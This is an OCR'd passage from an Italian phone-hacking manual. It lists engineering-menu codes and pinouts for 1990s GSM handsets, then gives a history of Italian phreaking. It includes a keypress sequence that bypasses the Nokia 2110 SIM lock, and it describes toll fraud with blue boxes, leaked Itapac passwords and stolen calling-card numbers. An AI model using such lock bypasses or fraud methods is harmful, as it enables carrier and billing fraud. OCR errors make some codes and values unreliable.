SPEGNERE 

Dovreste premere no uun po' di volte finchè il prompt Shut down? appare, premere YES 
e il telefono si spegnerà. 


1. 3 info diverse a seconad dello stato del telefono. 

e a.lItelefono non fa nulla: "Bxxx". "B" è "Broadcast channel" (a logic GSM channel) 
e b.Chiamatain corso: "Sxxx". S è "Stand Alone Dedicated Control Channel" 
SDCCH. 

e c. Chiamando: "Txxx". "T" è Traffic channel. Le "xxx" indicano il numero del 
canale, 1-124. 

2. Rx Level.l valori vanno da 0 a 63. Rx Level indica l'intensità della ricezione. 0 indica 
un segnale di -110dBm. 63 è circa -45 -50d4Bm.RXLEV è misurato in dBm in modo che il 
segnale in ingresso equivale a -110.5+RXLEV così che un RXLEV a 50 equivale a 
un'intensità del segnale di ingresso di -50.5 dBm (con un errore di 0.54Bm) 

3. Output power in dBm. 

4. Timeslot usato al momento. Si vede quando si fa una chiamata. 

5. Rx Quality. Rx Quality indica quanta correzione di errore è necessaria per parlare. 0 
indica nessuna, e come aumenta udrai più PING e PONG. Se RxQ è maggiore di 5, hai 
ottime probabilità di perdere la chiamata. RxQuality va da 0 a 7.RXQUAL viene misurata 
con una tavola in modo che la biterrorrate o BER siainteressante e misurata in % 
RXQUAL table 

0 BER <0,2(%) 

1 0,2 < BER< 0,4 

2 0,4 < BER < 0,8 


0,8 < BER < 1,6 

1,6 < BER < 3,2 

3,2 < BER < 6,4 

6,4 < BER < 12,8 

12,8 < BER 

6. Timing advance. TA viene misurato in halfbits cosicchè la distanza dal BTS può 
essere così calcolata =1,11*TA/2. | valori del TA vanno da 0 a 63. Questo indica anche 
quanto siete distanti dalla base in blocchi di 550 metri, fino ad un massimo teorico di 
35.2km. 


NOUNSW 


ERICSSON 788 

IMEI *#06# 

Software Version * -> * <- <- * <- * 

Service Provider Lock * <- <- * ma viene chiamato ME lock. Dopo averlo selezionato ci 
sono due opzioni su un altro menù( Lock to Network e lock to Network subsect). 


Codici per Ericsson GH688 GH388 GH628 GF788 GF768 
*#06# IMEI (International Mobile Equipment Identity) 


*#0000# Resetta la lingua in Inglese. 

>*<<*<* firmware revision information (software release) 
CXC125065 - internal product code. 

PRG - Firmware revision (date & time stamp). 

970715 1515 

>*<<*<*> 1-row text strings. Mostra tutti i txt di una riga. (298) 
>*<<*<*>> n-row text strings. Mostra tutti i txt di più righe. (160?) 


ERICSSON Pin-Outs 2xx & 3xx Series 

In Voice 

In +5V=External Power, 0V=Battery 

Out Ext Speak control 

Analog GND 

Out Voice 

Out +5V=POWER ON, 0V=POWER OFF 
Out Charger control 

Digital!DC GND 

In 0V=normal,+5V=test, +12V=test+flash 
10 In Hook 

11 In TTL serial in 

12 Out TTL serial out 

13 In OV for aprox 1 sec = POWER ONIOFF 
14 14 In DC Power supply 


OONQUIASWNHE 


ERICSSON GH688 Pin-Outs 
1=+ external power supply 
2= RS232 input (TTL) 

3= GND (digital) 

4= RS232 output (TTL) 

5 = +5V output 

6 = Test 

7 = Mute 

8 = Internal/external 

9= GND (analogic) 


10=? 
11=BFin 
12 = BF out 


1: Per caricare la batteria e alimentazione esterna. 
Non fa funzionare il telefono senza la batteria 
Voltaggio: 7.2V con almeno 600mA. 


4.6.3 


2: RS232 serial line input a livello TTL (0/5V). 


Connettetevi la RS232/TTL anche se l'output è 1!!! 

3: GND digital....no comment! 

4: RS232 serial out put a livello TTL (0/5V). Quando il telefono è acceso è a 1. 

5: +5V output con telefono acceso. 

6: Mode test. Generalmente è a 0. Per andar ein Test mode, spegnere il telefono, 
mettere il Pin a 1 (+5V), accendere il telefono. In questo modo la seriale lavora a 115200 
invece che ai soliti 9600. 

7: Mute. Di solito a 0, Va a 1 Quando si scorre o durante la conversazione. 

8: Se aperto, Il microfono e lo speaker interni sono accesi. Se a 0 sono abilitati quelli 
esterni. 

9: GND analogic (no comment). 

10: Mistero. Quando è a zero sembra che speaker e microfono si attenuino. 

11: BF in (no comment...) 

12: BF out (no comment...) 


4.6.3 Motorola 


MOTOROLA 6200/7500/8200/8400/8700 
Attivare l'RBS (Engineering Menus): 


[pause] [pause] [pause] 1 1 3 [pause] 1 [pause] [ok] 
(pause indica il tasto * tenuto premuto) 
Premere ora [MENU] scorrere fino a 'Eng Field Options' con le frecce e attivarlo. 


Disattivare l'RBS (Engineering Menus): 


[pause] [pause] [pause] 1 1 3 [pause] 0 [pause] [ok] 

Funziona sui 6200,8200,1-888,7500,8400 e gli StarTac GSM con una versione del 
software successiva alla .27. 

Opzioni dell'Eng Field Options 

Eng Field Options 


Active Cell 

RxLev -55 Potenza ricevuta in dBm 

NCC 0 National Colour Code, usato per identificare il colore 
BCC 7 Broadcast Colour Code, anche questo serve a scopi 
identificativi 

MSTxPwr 35 Massimo potere di trasmissione possibile 35dBm circa 3.2W 
C1 003 Indica la qualità di controllo del segnale inviata 
costantemente 


dall'RBS. Se il segnale rimane negativo per 5 secondi, 
il telefono cambia cella. 
Time Adv xxx xxx è un numero. Moltiplicato per 550da' la distanza 
in metri dall'RBS RBS (Radio Base Station), in meters. 
Adjacent Cells 


Adj Cell 1 
Channel 0033 Numero del canale 
RxLev -65 Potenza del segnale ricevuto in dBm 


BCCH Decode Dovrebbe significare che è capace di decodificare la channel 
information contenuta nel BHCC 

RxLevAM -104 Ricezione Minima consentita, comparata con RxLev -65 si 
si ottiene C1 (che è 39) e viene reinviata alla base come 
indicatore della forza del campo 


MTxPwr 35 Aain max consentito 

C1 003 ?? 

NCC 0 National Colour Code 
BCC 6 Broadcast Colour Code 


System Parameters 
Combined Off ?? 
AcsClas 0000 Consente diverse priorità -(questo gestore non lo supporta). 


4.6.4 


4.6.5 


MCC 505 Mobile Country Code, 505 per l'Australia, 240 per la Svezia 
etc 


MNC 01 Mobile Network Code, 01 02.. a seconda del gestore 
LAC 08720 Location Area Code, dove siete. 

CelllD 00473 Base Station Identity 

T3212 005 Tempo tra gli aggiornamenti periodici della rete 


(o ore o minuti che mancano. non sono sicuro) 
BS-PA-MFRM 4_?? 
XZQTY 14.3 22? 


Motorola Flip Pinout: 


ANT- (O) [1IITTTITI 
10987654321 


parte superiore (Schermo) 
1) Audio Ground 
2) Ext b+ 
3) T Data 
4) C Data 
5) R Data 
6) Logic Ground 
7) Audio Out - onloff 
8) Audio In 
9) Manual Test 
10) Battery Feedback 


4.6.4 NEC 


NEC G8/NEC G9/INEC Kiss/NEC Sportz Digital 
IMEI: *#06# 


4.6.5 Nokia 


NOKIA 1610 

IMEI *#06# 

Software Version *#170602112302# 
L'ultima versione è sotto Phone Info 


Pinouts 
1 GND Digital Ground 
2 V_OUT Output per accessori. (Min/Typ/Max - 3.25V...10V 
- Output Current 50mA) 
3 XMIC Input dek microfono esterno e identificazione accessori 
*TYPIMAX: 8...50 mV(Il valore massimo corrisponde a 
OdBm Network 
LIVELLO CON GUADAGNO AMPLIFICATORE IN 
INGRESSO SETTATO A 20 dB ,Il valore tipico 
è il massimo -16 dB) 
ID Accessory Identification 
*1,7...2,05 V HEADSET ADAPTOR connesso 
*1,15...1,4 V COMPACT HANDSFREE UNIT connesso 
NC Non Connesso 
Non Connesso 
MBUS Serial Control Bus 
*Logic Low Level: 0....0.5V 
*Logic High Level:2.4V....3.2V 
NC Non Connesso 
Signal Ground 
XEAR Speaker esterno e controllo Mute 
*Min/Typ/Max: 0....32....500 mV (il livello tipico 
corrisponde a -16 dBM) 
Network Level col volume settato a un valore nominale 
di8dB sotto il massimo 


OUA 
Z 
O 


OO N 
9) 
(O) 
Z 
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Maximum 0 dBM m,assimo guadagno volume codec -6dB) 
Mute ON (HF SPEAKER MUTE ):0...0,5 V d.c. 
Mute OFF (HF SPEAKER ACTIVE ): 1,0...1,7 V d.c. 


10 Hook Hook Signal 
*Hook Off (Handset in uso): 0....0.5V 
*Hook On (Handset in Uso): 2.4V....3.2V 
11 NC Non Connesso 
12 V_IN Voltaggio del caricabatterie (Max 16V) 
NOKIA 2010 
IMEI *#06# 


Software Version *#9999# 


NOKIA 2110 / PHILIPS 747 

IMEI *#06# 

Software Version *#9999# 

L'ultima versione è sotto Phone Info 

Il tipo è NHE-1XN 

Per bypassare il SIM Lock sul 2110; 

Accendere il telefono, Quando chiede il codice di sicurezza, 

premere 112 e dopo il pulsante di invio. 

ora premere velocemente # e invio, end, invio e invio. 

Questo disattiva il Sim Lock fino alla prossima volta in cui spegnerete il telefono. 


NOKIA 2110e/i / PHILIPS 7471 

IMEI *#06# 

Software Version *#170602112302# 

Con l'ultima versione del software digitare invece *#682371158412125# 

L'ultima versione è sotto Phone Info 

Settimana e anno di fabbricazione: *#3283# 

Sui telefoni fabbricati prima del 01/01/96 1295 significa December 95, sui telefoni 
successivi allo 01/01/96 2196 significa la 21esima settimana del 1996. 

Per togliere il CAPS LOCK tenere premuto il pulsante dela lettera desiderata. 


NOKIA 2110 PINOUT 

Pinouts del X100 system connector 

ANT 16 9 Connettore caricabatterie 

(O) 1-1-1--I-1-1-1() (0) 

CON 81 

Il simbolo (O) a sinistra è il connettore dell'antenna per i kit per auto. i simboli numerati 
16-9 in cima e 8-1 in basso sono i system connector. La ()è lo soazio tra il connettore e 
(o)è l'attacco per il caricabatteria da casa. 


PIN Name Description 

1,9 GND Terra (Digital) 

2 MIC/JJCONN Input audio esterno dagli accessori 
o microfono esterno. 

3 AGND Terra analogico per gli accessori 

4 TDA DBUS data trasmesso agli accessori 

5 M2BUS Serial Bidirectional data e controllo 
tra telefono e accessori 

6 HOOKIRXD2 Hook indication. HP ha un resistore 
pull-up di100KE pull-up 

7 PHFSITXD2 Kit mani libere on/off, dati per flashare 
le apparecchiature di programmazione. 

8,16 VCHAR Voltagio per la ricarica delle batterie 

10 EARIHFPWR Audio output per gli accessori e kit mani 
libere 

11 DSYNC DBUS data bit sync clock 

12 RDA DBUS dati ricevuti dagli accessori 

13 BENA Power supply all'adattatore 

14 VF Voltaggio di programmazione per la FLASH 


15 DCLK DBUS data clock 


DTMF PROGRAMMING 


E' possibile programmare un intera sequenza di toni DTMF. 
Digitare il numero. 
Premere tre volte * appare una 'p' (pause). 
digitare la sequenza di toni DTMF , si può usare 'p' di nuovo. 
Memorizzare. 
se selezionate ore questo numero dalla memoria e lo chiamate, il telefono aspetterà 
qualche secondo (pause) e poi invierà la stringa come DTMF. 
e Un'altro modo consiste nel premere * quattro volte: appare una 'w' (wait). Quando la 
‘w'arriva al punto di essere eseguita nella stringa, 'DTMF' appare sulò menu' del pulsante 
destro. Quando premete questo pulsante il telefono inizierà ad inviare i DTMF. 


CARKIT PROGRAMMING 


Se usate un Kit per auto con un viva voce e un una cornetta addizionale, e volete 
passare dal vivavoce alla cornetta: 

e Premete il bottone del menu a sinistra, e alzate la cornetta. 

e  Orasietecolvivavoce. 


NOKIA 3110 

IMEI *#06# 

Software Version *#3110# 

*#92702689# - il telefono chiederà un codice di garanzia: 

Ci sono alcune possibilità qui 

6232 (OK) : Mese e anno di fabbricazione 

7332 (OK) : Data dell'ultima riparazione 

7832 (OK) : Data di acquisto del telefono 

9268 (OK) : Serial Number 

37832 (OK) : Settare la data di acquisto MMYY 

87267 (OK) : Coinferma trasferimento, relativo a quando si aggiorna il firmware. 
*#746025625# - il telefono dirà 'SIM CLOCK STOP ALLOWED' o "SIM CLOCK STOP NOT 
ALLOWED" a seconda della SIM Card. 

*#7780# ripristina le impostazioni della fabbrica. 

Tipo NHE-8 


NOKIA 3810 
IMEI *#06# 
TSoftware Version *#3810# 


NOKIA 5110/6110 

IMEI *#06# 

Software Version *#0000# 

L'ultima versione è sotto Phone Info 

Tipo NSE-3NX 

*#92702689# Mostra IMEI e numero seriale. Ci sono varie opzioni tra cui scorrere. 
- data di fabbricazione (Made: 1197) 

- Data di acquisto (Purchasing Date: 1197) 

- Data di riparazione (Repaired: 0000) 

- Transfer User Data? 


Per uscire spegnere il telefono e riaccenderlo. 
*3370# attiva Enhanced Full Rate (*efr0#) 
#3370# disattiva Enhanced Full Rate (#efr0#) 
*4720# attiva Half Rate (*hra0#) 

#4720# disattiva Half Rate (#hra0#) 

Inserendo questi codici il telefono si riavvierà. 


6110 Sim Card Locking 


La SIM card può essere bloccata in quattro modi sul 6110. 
Country Lock - La lega al paese di appartenenza 

Network Lock - La lega al Network 

Provider Lock - La lega al gestore di rete 

Sim Lock - Lega il telefono a quella SIM 

Per vedere lo stato del proprio telefono 
#pw+(mastercode)+X# 

(mastercode) è un numero di 10 cifre. 

X è un numero da 1 a4, indica uno dei 4 precedenti blocchi. 
"Sim not restricted' indica che il telefono non è bloccato 


Nuove suonerie 

Settare SMSC +358405202999 (Smart Messaging) 

Inviare un SMS al numero 99999 con la parola TONESnel testo 

Appena otterrete una risposta (sarà una lista di nuove suonerie), modificatela in modo 
che la suoneria che volete ricevere non abbia l'asterisco davanti. Inviate il messaggio al 
99999. Il telefono mostrerà NEW RINGTONE RECEIVED. 


NOKIA 8110/8110i 

IMEI *#06# 

Software Version #8110# 

L'ultima versione è sotto Phone Info. 

*#92702689# - il telefono chiederà un codice di garanzia: 

Ci sono alcune possibilità qui 

6232 (OK) : Mese e anno di fabbricazione 

7332 (OK) : Data dell'ultima riparazione 

7832 (OK) : Data di acquisto del telefono 

9268 (OK) : Serial Number 

37832 (OK) : Settare la data di acquisto MMYY 

87267 (OK) : Coinferma trasferimento, relativo a quando si aggiorna il firmware. 
*#746025625# - il telefono dirà 'SIM CLOCK STOP ALLOWED' o "SIM CLOCK STOP NOT 
ALLOWED" a seconda della SIM Card. 

Il tipo di telefono è NHE-6 


Pinouts 
1 GND Charger/System Ground 
2 V_OUT Output per accessori. (Min/Typ/Max - 3.4V...10V - 
Output Current 50MA) 
3 XMIC Input dek microfono esterno e identificazione accessori 
*TYPIMAX: 8...50 mV(Il valore massimo corrisponde a 
OdBm Network 
LIVELLO CON GUADAGNO AMPLIFICATORE IN 
INGRESSO SETTATO A 20 dB ,Il valore tipico 
è il massimo -16 dB) 
ID Accessory Identification 
*1,7...2,05 V HEADSET ADAPTOR connesso 
*1,15...1,4 V COMPACT HANDSFREE UNIT connesso 
4 EXT_RF. Controllo antenna esterna 
Min/Max: 0...0.5V RF esterna in uso 
Min/Max: 2.4...3.2V uso antenna interna 
5 TX FBUS Transmit 
6 MBUS Serial Control Bus 
*Logic Low Level: 0....0.5V 
*Logic High Level:2.4V....3.2V 
NC Non Connesso 
Signal Ground 
XEAR Speaker esterno e controllo Mute 
*Min/Typ/Max: 0....32....500 mV (il livello tipico 
corrisponde a -16 dBM) 
Network Level col volume settato a un valore nominale 


OO N 
9) 
(O) 
Z 
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4.6.6 


di8dB sotto il massimo 
Maximum 0 dBM m,assimo guadagno volume codec -6dB) 
Mute ON (HF SPEAKER MUTE ):0...0,5 V d.c. 
Mute OFF (HF SPEAKER ACTIVE ): 1,0...1,7 V d.c. 
10 Hook Hook Signal 
*Hook Off (Handset in uso): 0....0.5V 
*Hook On (Handset in Uso): 2.4V....3.2V 
11 NC Non Connesso 
12 V_IN Voltaggio del caricabatterie (Max 16V) 


NOKIA 9000/9000i 

IMEI *#06# 

TSoftware Version *#682371158412125# 
L'ultima versione è sotto Phone Info 
Anno e mese di fabbricazione *#3283# 
Tipo di telefono GE8 


NOKIA GENERAL INFO 

Queste informazioni sono valide solo per i 2010, 2110, 2110e (e probabilmente gli 
ETACS 636 e forse 232), non i 1610 o 8110 perche' usano differenti caricatori. 

Il caricabatterie della NOkia fornisce 12Vdc limiutati a 770mA. La fine della ricarica 
viene identificata dallo stesso telefono. Notate che connettendo 12Vdc senza limitare la 
corrente danneggia sia il telefono che le batterie. A volte il telefono mostrerà la 
scritta"not charging", Altre volte il transistor all'interno del telefono si brucerà 


4.6.6 Philips 


Philips DIGA 
IMEI *#06# 


Connect Time *#2558*# 

(No) Blocking List *#3333*# 

Init, Flags, Sim Lock *#3377*# 
Resetta la (No) Blocking List *#3353*# 
Mostra il Security Code *#7489*# 


Philips FIZZ 
IMEI *#06# 


informazioni sul telefono *#8377*# 
"Version : 0916 - EEPROM : 00000000-00 - TDA : 1941 - KISS : 0502" 


Alcuni telefoni, probabilmente quelli col SIM lock attivato, mostrano la scritta SIM-LCK 
alla fine della stringa. 
security code *#1234*# (1234 è quello di default...) 


"Security code : XXXXX" 
Service Code *#5644*# 


"Version : 09162205 - EEPROM : 0000000-00 - TDA : 1941 - KISS : 0502" 


Philips SPARK / GENIE 
IMEI *#06# 


*#2254*# : Statusregister: C, BS, RR, MMI, CREAT. 

*#2255*# : attiva e disattiva "DEBUG CALL"-Mode; quando attivato, chiama un numero 
occupato e il telefono mostrerà delle stringhe esadecimali. 

*#2558*# : Il tempo in ore minuti e secondi in cuisei stato connesso alla rete. 

*#2562*# : IUI telefono si riconnette alla rete 

*#2565*# : warmstart ? 

*#3333*# : (NO) BLOCKING - list (15 oggetti) 

*#2377*# : "BEER": non chiaro. A volte il telefono aspetta un po' e poi si ricollega alla 
rete, a volte si resetta. 

*#3377*# : Init, Flags, SIM LCK 


*#3353*# : resettta la (NO) BLOCKING - list 

*#7378*# : Name, Length, SIM phase 

*#7489*# : SECURITY CODE 

*#7693*# : attiva e disattiva lo SLEEP MODE (se disattivato la batteria scendera!) 
*#7787*# : SPURIOUS INTERRUPT 

*#7948*# : SWITCH OFF: non chiaro; sembra un timer 

*#8463*# : Informazioni sullo SLLEP MODE: Wake, Sleep Req., Sleep 


Philips Pinouts (Fizz e Spark) 
GROUND 


GROUND 
HANDS FREE ON/OFF 


RTS 
REPROGRAMMING 
ON HOOK CHARGER (APPROX 13V? TO 14V) 
10 AUX MIC 
11 AUX SPEAKER 
12 GROUND 
13 +VCC for Car Charger 
14 14 +VCC for Car Charger 


OONDOGUISWNHE 
+ 
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Tutti i GSM Philips antecedenti il Philip's Fizz sono stati prodotti in cooperazione con la 
Nokia. 


Sezione 5: Storia e Varie 


5.1 Non solo scatole blu 
Di M.F. Tratto da Decoder 


Capita sempre più spesso, sfogliando riviste più o meno specializzate o anche normalissimi 
quotidiani, di imbattersi in episodi di pirateria telefonica (utilizzo di determinati servizi eludendo 
il relativo addebito). 


Citando Stephen King, si può dire che tali eventi costituiscono l'inseparabile "metà oscura" della 
telefonia. Diventa più complicato distinguere in essi ciò che realmente può essere chiamato 
"phreaking" e ciò che risulta essere un banalissimo reato; la differenza esiste ed è sostanziale: il 
phreaker è un esperto di telecomunicazioni che ricerca e utilizza metodi per evitare la tassazione 
della chiamata, una cosa ben diversa dal furto di un apparecchio cellulare o dallo scasso di un 
telefono pubblico con trapano e scalpello. 

Definito il termine, rimane da chiedersi se in Italia esistano davvero gruppi di phreaker o se nella 
migliore delle ipotesi esistano solo lamer che si occupano unicamente di utilizzare informazioni 
provenienti dall'estero, e di cui conoscono solo in parte il significato tecnico. (Il termine "lamer" 
nel modo informatico indica un incapace che sfrutta passivamente prodotti o metodi elaborati da 
altri). Smettiamola quindi per un attimo di pensare agli abili phreaker nordeuropei, americani o 
australiani ed esaminiamo la situazione del nostro paese. 

Chi si serve delle sue conoscenze in campo informatico-telematico per inserirsi in sistemi 
riservati di scambio dati e acquisire particolari info o privilegi (studiando e bypassando i metodi 
di protezione adottati) è un hacker; requisito essenziale per un hacker è il possesso di un 
modem. Hacking e phreaking sono strettamente legati: è utile collegarsi a un sistema senza 
pagare la telefonata, specie se intercontinentale, e nello stesso tempo lo studio delle 
caratteristiche di una rete telematica può portare a nuovi metodi di chiamata senza addebito. 


Un BBS (banca dati) gestito da un privato o da un gruppo rimane inoltre il miglior mezzo per lo 
scambio di informazioni, ancora meglio se si tratta di più BBS collegati in rete. 

Il Piano Regolatore Telefonico Nazionale (P.R.T.N.) definisce i ruoli delle Aziende che formano il 
gruppo STET, assegnando a SIP il compito di gestire i rapporti con il singolo utente. 

L'inerzia da parte della società nell'accettare la libera diffusione di apparati modem, nei primi 
anni Ottanta, impedì per lungo tempo l'esplosione del fenomeno banche dati private, al contrario 
di quanto avveniva all'estero nello stesso periodo; in effetti, da questo punto di vista il nostro 
paese rimase decisamente arretrato. 

In quegli anni erano cominciati in Italia gli esperimenti per la realizzazione di una rete nazionale 
di interscambio dati sull'onda del successo del network inglese PSS. Tuttavia, gli alti costi di 
abbonamentoltraffico e la pretesa da parte di SIP di censire ogni modem privato autorizzando 
solo l'uso di apparati "omologati" limitarono l'utilizzo di questa rete, che fu chiamata Itapac, a 
pochi privilegiati. In realtà le periferiche "omologate" erano sì prodotti di buona qualità, ma 
assolutamente uguali a quelli venduti in altri Paesi a 1/3 del prezzo italiano (a quanto pare SIP 
riuscì a guadagnarci qualcosa, visto che lo stesso giochetto fu successivamente applicato a 
cordless, FAX e telefoni cellulari. Attualmente vale solo per questi ultimi). 

La diffusione dei compatibili IBM e dei portatili con modem incorporato introdusse l'era dello 
scambio dati tra utenti in Italia, ma fu il Commodore 64 il vero simbolo informatico della prima 
metà degli anni Ottanta. Furono importati accoppiatori acustici e modem diretti realizzati per 
questo computer, e si cominciò a parlare di banche dati, anche se la velocità di trasferimento 
ammessa dal protocollo CCITT V22 non era molto alta (circa 130 caratteri alfabetici per secondo 
come punta massima). L'incognita della mancata omologazione dei suddetti modem restò tale 
ancora per qualche anno, ma i provvedimenti della compagnia telefonica contro questo tipo di 
abusi da parte dell'utente furono pochissimi, e tutti giustificati da poco plausibili dichiarazioni di 
danni arrecati alle linee a causa di manipolazioni non autorizzate. 

Nello stesso periodo SIP cominciò a sentire la necessità dei una rete di servizi più vicina 
all'utente, copiò i modelli europei e partorì una mostruosa creatura: il Videotel (VDT). 

Per ridurre le raffiche di spurie, effetti delle interferenze elettromagnetiche sulle linee, fu 
utilizzato il protocollo CCITT V23-1200/75 BPS, tuttora in uso, associato a sistemi di correzione 
dei dati trasmessi. Questa scelta impose l'acquisto di un modem che prevedesse tale non 
comunissimo formato, oppure l'impiego del terminalino fornito da SIP stessa. 

Videotel fu un prodotto sciagurato: non incontrò il previsto favore popolare, e i gestori fecero di 
tutto per promuoverlo trascurandone il difetto principale: i costi di collegamento oltre ogni 
razionale proporzione, Come primo errore, riempirono il sistema di account intestati a utenti 
inesistenti, che subito finirono nelle mani di decine di abusivi. Se la diffusione di tali codici di 
accesso fu in un certo senso calcolata, per motivi pubblicitari, non fu previsto l'effetto 
collaterale: con una buona quantità di password facilmente a 

disposizione, gli hacker dedussero al volo il peraltro elementare algoritmo che le generava. 
Commodore commercializzò un piccolo modem per connettere C64 a VDT e successivamente 
Philips ideò un interfaccia che trasformava il televisore di casa in un terminalino: la caccia alla 
password Videotel divenne uno sport nazionale. 

Sul piano del phreaking, il canale della pirateria software (da sempre strettamente legato agli 
abusi telefonici) continuò a regalare aneddoti e informazioni, specialmente di origine americana 
o nordeuropea; in Italia tuttavia mancavano le condizioni per poterle utilizzare. 

Unica eccezione la black box, sperimentata anche nel nostro paese diverso tempo prima, che fu 
riesumata: si trattava di un semplice gruppo di componenti elettronici (talvolta un solo resistore) 
che compensando la variazione di un parametro fisico della linea impediva alla centrale 
dell'utente di rilevare che egli aveva appena risposto a una chiamata. In tal modo, il chiamante 
non riceveva addebito per quella comunicazione. 

Nonostante la diffusione in alcuni paesi del nostro continente, non si può parlare di un fenomeno 
"black box" in Italia. II metodo, molto vecchio, non ebbe mai successo, stroncato anche da 
centrali urbane di più recente concezione in grado di rilevare ed escludere questo tipo di 
anomalie. 

Nella seconda metà degli anni Ottanta Italcable presentò nuovi servizi, primi tra tutti i numeri 
verdi internazionali estesi a più Paesi. Questo permise ai phreaker di importare una tecnica 
divenuta famosa all'estero circa un decennio prima con il nome di blue box (il primo modello 
individuato era appunto alloggiato in una scatola blu), le cui origini sono tuttora controverse: 
qualcuno ne attribuisce la paternità agli stessi progettisti o tecnici delle linee internazionali; per 
certo, protagonisti storici dell'informatica si dedicarono al perfezionamento di tale piccolo 
apparato. Questo dispositivo, reale o simulato dal software, grazie all'imitazione di alcune 
frequenze di dialogo tra centrali telefoniche di un certo tipo, permetteva di indirizzare ad altro 
utente una chiamata originariamente instradata su numero verde, evitando così l'addebito. 


Semplice e raffinata, la blue box non produceva un reale danno economico ai concessionari 
delle linee, ma era per contro un'entità troppo conosciuta. 

Dalle compagnie telefoniche stesse innanzitutto, e poi, se non altro come "leggenda", dai ragazzi 
di mezzo pianeta. 

Degli oltre venti tipi di box realizzati negli USA, non si hanno notizie di impieghi rilevanti, nel 
nostro paese, per modelli diversi dai due citati: casi isolati di interconnnessione abusiva di due 
linee o tentativi di vandalismo telefonico rientrerebbero nella categoria "boxes" ma furono fatti 
più unici che rari. 

A partire dal 1986 iniziò la proliferazione incontrollata, nell'ambiente Videotel, dei servizi di 
messaggeria, o chat (centoquaranta in meno di cinque anni); la prima messaggeria 
internazionale, accessibile in seguito all'interconnessione Videotel-Minitel divenne uno dei punti 
di incontro degli hacker di quel periodo. La qualità e la diffusione dei modem migliorarono di 
molto, intorno al 1987 si potevano acquistare discreti prodotti e installarli senza difficoltà nè 
problemi con la compagnia telefonica. 

Itapac era già conosciuta nelle università perché la rete telematica accademica (oggi nota come 
Internet, è un network di reti) era collegata con essa; il solito Videotel inoltre si appoggiava (e si 
appoggia) a Itapac per raggiungere i servizi. Gli hacker dunque iniziarono a usare tale sistema di 
scambio dati per raggiungere nuovi ambienti telematici italiani ed esteri. 

Alcuni codici di accesso usati intorno al 1988 divennero famosi. Con la diffusione di Amiga la 
pirateria del software, primo e spesso unico mezzo di importazione e diffusione, fece un salto di 
qualità; il modem divenne una periferica comune, utilizzata per il prelievo delle ultime novità per 
lo stesso Amiga o per MS-DOS dalle numerose banche dati che andavano nascendo in quel 
periodo. Nuovi metodi di correzione errori eliminarono l'incubo delle spurie. 

L'azienda statunitense US Robotics sviluppò un protocollo non omologato dal CCITT per 
trasmissioni ad alta velocità; questi modems, largamente utilizzati anche nel nostro paese, 
risolsero il problema della lentezza di trasferimento anche se il costo dell'apparato rimase alto 
fino alla diffusione di modem concorrenti, avvenuta molto più tardi grazie all'introduzione dello 
standard CCITT V32bis. 

Siamo sempre nella seconda metà degli anni Ottanta: il nuovo algoritmo elaborato per la 
generazione di password Videotel fece in breve la fine del suo predecessore. | contrasti per 
motivi economici tra i fornitori di informazione di Videotel e la compagnia telefonica divennero 
pesanti, SIP stessa decise di ridurre la sua partecipazione alla gestione del servizio (attualmente 
si occupa solo del sistema di sicurezza e dei rapporti diretti con l'utente). 

L'accesso a Itapac cessò di essere un fenomeno d'elite nel settembre 1989, quando alcuni codici 
superarono le frontiere del ristretto mondo degli hacker e iniziarono a essere utilizzati da utenti 
più "novellini". ltapac permetteva il collegamento a banche dati americane anche al di fuori della 
rete stessa grazie a particolari indirizzi detti outdialers; fu l'aspetto più interesssante del network 
in quegli anni, dopo i servizi di messaggeria. Speciali outdialer inoltre potevano raggiungere 
gratuitamente una banca dati in qualsiasi parte del mondo, unico difetto la lentezza di Itapac e il 
fatto che la chiamata avesse origine fisica negli Stati Uniti, con tutti i problemi che potevano 
derivare da una connessione intercontinentale a bassa velocità. 

Ma Itapac era utilizzabile soltanto da determinate città, concentrate nel Nord del paese; nel 1990 
SIP introdusse il numero verde nazionale 1421 che consentì l'accesso alla rete con precise 
limitazioni (reverse charging) da tutt'Italia, anche se ci volle molto tempo per il completamento 
del servizio. 

Nel settembre 1990, in occasione di SMAU, un periodico pubblicò a scopo dimostrativo un 
codice di accesso a Itapac 1421 valido senza restrizioni su tutto il territorio nazionale; questo fu 
l'episodio più famoso nella storia della rete e interessò centinaia di proprietari di modem: 
quando tale password (5GFvdD) fu disattivata, nel gennaio1991, l'accesso al network era 
divenuto un vizio ed esplose il bisogno di altri codici validi. L'implementazione del collegamento 
"countrydirect" intanto, aveva apero nuove frontiere per il phreaking, legate specialmente 
all'importazione software. Si trattava di numeri gratuiti internazionali che permettevano di usare 
servizi e sistemi di addebito di compagnie straniere, ad esempio le carte di credito telefoniche 
statunitensi i cui numeri, da anni, erano oggetto di collezione e scambio tra i pirati telematici. 
Con un pò di lingua inglese e un numero di carta USA valido, la chiamata gratuita negli States fu 
possibile per tutti; per raggiungere altre nazioni serviva solo qualche codice in più, quello dei 
PBX. 

Bridges, loops, conferences, e altri gadget tipici delle reti nordamericane, furono alla portata dei 
phreaker italiani; fu ad esempio possibile chiamare contemporaneanente 8, 10, 15 persone 
disperse in varie parti del mondo. Videotel rese disponibili simpatici servizi di addebito su 
password per l'acquisto di piccoli oggetti, e i phreaker trascorsero l'allegro periodo dei mondiali 
di calcio inviandosi a spese di terzi orchidee e adesivi personalizzati. 


Difetti nel software delle centrali elettroniche fecero nascere in quegli anni strane voci su 
possibili nuove tecniche di phreaking, ma non vi furono novità rilevanti. 

Verso la fine del 1990, iniziarono a essere create in banche dati private aree di hacking/phreaking 
degne di questo nome; l'esperimento di aprire spazi simili all'interno di un network di BBS sarà 
in seguito tentato da due reti nazionali, EuroNet e FidoNet; in entrambi i casi la smisurata 
paranoia di alcuni pseudo-responsabili condurrà all'aborto del progetto, seriamente ripreso solo 
dalla neonata CyberNet nell'aprile 1993. Nel dicembre 1990, due novità: il primo PBX su numero 
verde 1678 e il primo outdialer in grado di chiamare gratuitamente banche dati in ogni parte del 
mondo a partire da Milano. 

Venne l'estate '91, e una serie di inchieste giudiziarie assestò un duro colpo alle truffe che i 
fornitori di informazione di Videotel perpetravano da tempo di danni di SIP. Questi episodi, 
naturalmente, non ebbero nulla a che vedere con il fenomeno dell'hacking ma rivelarono una 
volta per tutte le lacune del sistema. 

Le possibilità del reverse charging (Itapac 1421) furono adeguatamente esplorate, si scoprì così 
che dopo tutto non era affatto necessario possedere un codice di accesso per penetrare nella 
rete. Sempre tramite Itapac, fu trovato il modo di inviare FAX ed espressi a qualsiasi destinatario, 
ovviamente senza spendere nulla (1991/92). Per quanto riguarda i posti telefonici pubblici, è 
